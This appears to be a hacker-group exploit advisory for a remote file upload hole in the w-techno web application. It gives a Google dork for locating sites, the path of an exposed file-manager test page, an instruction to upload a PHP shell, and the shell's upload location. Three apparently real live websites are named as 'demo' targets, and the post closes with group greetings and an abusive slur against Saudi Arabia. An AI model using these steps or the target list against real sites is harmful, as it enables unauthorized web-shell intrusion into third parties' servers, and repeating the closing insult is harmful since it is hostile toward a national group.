========================================== w-techno Remote File Upload Vulnerability ========================================== [+]################# Info ################### [+] #(+) Exploit Title: w-techno Remote File Upload Vulnerability #(+) Author : Net.Edit0r #(+) Discovered By: 3H34N #(+) E-mail : Black.Hat.tm@Ggmail.com and Ehsan.Empire@Att.Net #(+) Google dork : "برمجة وايد تكنولوجي" #(+) Versian : All Ver #(+) Category : Web Apps [Remote] #(+) Platform : Tested on: linux #(+) Software Link: http://www.w-techno.com/ [+]################# ExploiT ################### [+] [+] ExploiT : rte/editor/filemanager/browser/default/connectors/test.html# [+] Example : http://127.0.0.1/rte/editor/filemanager/browser/default/connectors/test.html# [+] Just use PHP Mode for uploading your files ===[ Upload To ]=== [+] http://127.0.0.1/edu/UserFiles/File/[Shell] [+] Demo Site : [+] http://www.qawafelbh.com/rte/editor/filemanager/browser/default/connectors/test.html [+] http://www.edubh.com/rte/editor/filemanager/browser/default/connectors/test.html [+] http://www.hamalat.org/rte/editor/filemanager/browser/default/connectors/test.html ######################################################################## (+)IRANIAN Young HackerZ # Persian Gulf (+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly #BHG (+)Sp My Best Friend : HUrr!c4nE ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~ Ashkan ..SkilleR.. ~ M4Hd1 ~ 4min ~ d3v1l.eyes ~ S3Ri0uS and all Friends (+)Gr33ts to : All Iranian HackerZ (F.u.c.k Saudi Arabia ) ########################################################################